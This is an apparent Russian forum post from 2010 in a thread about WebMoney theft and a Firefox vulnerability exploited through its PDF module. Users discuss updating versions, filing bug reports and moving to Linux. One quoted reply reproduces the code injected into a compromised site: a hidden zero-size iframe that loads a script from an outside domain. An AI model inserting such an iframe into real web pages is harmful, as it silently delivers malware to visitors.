_vb_

_vb_
Рейтинг
104
Регистрация
25.07.2009
dkameleon:
мусье любитель теорий заговора? :)

Ну заговора - не заговора, а присмотреться к справке отдела кадров вебманей об уволенных за последний год/полгода имхо было бы им полезно.

Евген:
а зачем это надо?

Иногда бывает непонятно, то ли это новая животрепещушая тема с кучей только что написанных страниц, то ли кто-то апнул древний топик. Нужно заходить в топик, смотреть. Неудобно.

Конечно это совершенно не критичный момент, просто будет чуть удобнее пользоваться форумом.

Devvver:
Тоже интересно, то что pdf,doc,txt индексируется факт, а ссылки из них?

ссылки из pdf гуглом индексируются.

Dreammaker:
считаю, что все же более свежие версии использовать полезно, ибо новые дыры некоторое время мало известны. :)

Дык палка то о двух концах. О старых дырах и я более-менее осведомлен. А вот в новых версиях откуда ждать ахтунга - иногда совершенно неясно.

Dreammaker:

На самом деле поможет, уже тем, что кипер хочь-не хочь, а использовать толком не получится.

Ну отказаться от использования классика (до выяснения) можно и без перехода на линукс.

Dreammaker:

в данных спорах рождается не то что истина, а возможность посмотреть на вопрос с разных сторон.

🍻

Dreammaker:
_vb_, 3.6.3 как раз выпустили чтобы залатать большую дыру в ФФ.

Просто я имею некоторое отношение к разработке и есть понимание взаимосвязи затыкания старых дыр и появления новых 😂

Хотя в данном конкретном случае, возможно Вы и правы.

Dreammaker:

p.s. Ещё можно пошутить в стиле - вот почему вы от Linux отказываетесь :D

Ваше право. Но я от линукс не отказываюсь, просто я пытался объяснить тут народу (не слишком успешно, по моему), что для решения данной конкретной проблемы с вебманями - переход на линукс мало чем помочь может.

Dreammaker:
а почему не 3.6.3 ?

У меня по жизни принцип - идти на шаг позади технического прогресса. Много здоровья и нервов сохраняет ;)

Просто дома нет набора виртуалок для пробования разных вариантов, а на работе времени нет.

beginerx:
кто знает куда и как плиз запостите баг репорт разработчикам мозилы☝☝☝

Пробовал 3.5.8 сначала. Обновил лису до 3.5.9 - все равно пробивает. Через его модуль обработки pdf. баг-репорт отписал, тока не знаю, когда на него внимание обратят и доживет ли указанная ссылка до этого момента.

Хром, кстати - стоит как скала.

beginerx:

В принципе в первые вижу реально работающий троян именно под Firefox раньше видел только под IE/

Гыгы. Насмешили. Красненькие квадратики тут - это дыры, через которые такие атаки и осуществляются.

_vb_ добавил 02.04.2010 в 21:34

dihlofoss:

Попытка авторизации в Интернет-банке Собинбанка:
http://dihlofoss.spb.ru/sobin.jpg
Как видите,несмотря на использование виртуальной клавиатуры и https видим все реквизиты.(сниффер HTTP Analazer,если что)

Я на форуме уже постил ссылку, но видно в данном разделе эта тема окажется более животрепещущей :)

beginerx:
а тело удалось посмотреть? интересно какие дыры в лисе используются?

А смысл его рассматривать? Завтра-послезавтра оно уже другое будет. Оно живет в до тех пор, пока онлайновая проверка не покажет его наличие в основных антивирусных базах. Там ведь конвейер, почище чем конвейер по выпечке ГС.

Симантек правда ругнулся, но как-то невнятно.

hectorix:
urod.ru скорее всего содержал сплоит, процентов на 90% я уверен что хапнул именно оттуда

добавил......

вот что там висит щас

<noindex><iframe src="http://trfistb.info/for.cgi?tank" width="0" height="0" style="visibility: hidden;"></iframe></noindex>


Нормально?

угу, оно. бился в ограниченном аккаунте, как тигр в клетке. мозилу мне подвесил. если б умел привилегии повышать - полностью бы овладел той виртуальной машинкой, где запускался :)

Всего: 1614